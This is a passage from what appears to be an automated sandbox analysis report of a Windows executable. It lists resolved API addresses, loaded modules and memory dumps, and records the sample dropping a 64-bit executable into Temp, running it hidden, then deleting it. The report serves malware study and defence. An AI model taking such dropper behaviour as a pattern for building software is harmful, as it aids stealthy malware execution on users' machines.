|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x74600060 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74b79080 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74b9ab40 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74b83570 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74ba09b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74ba2bec |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74b7d0c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74b793b0 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x744a1590 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x744a1510 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x744a1570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x75ea6700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7500d900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x75ea49a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75ea7760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x75ea7780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x75ea72c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x75ea7440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-22 14:10:10 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 20043766280 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #28: mxkefu6a.exe
181
0
| Information | Value |
|---|---|
| ID | #28 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula "SmsInterceptStore.db" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:15, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:40 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1378 |
| Parent PID | 0x1344 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
137C
0x
1380
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Marked Writable | - | 32-bit | - |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040F93F, 0x00407336 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00406078 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | os_pid = 0x106c, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x75b75c60 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x75b74810 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74b807d0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74b8e6a0 |
|
1 | |
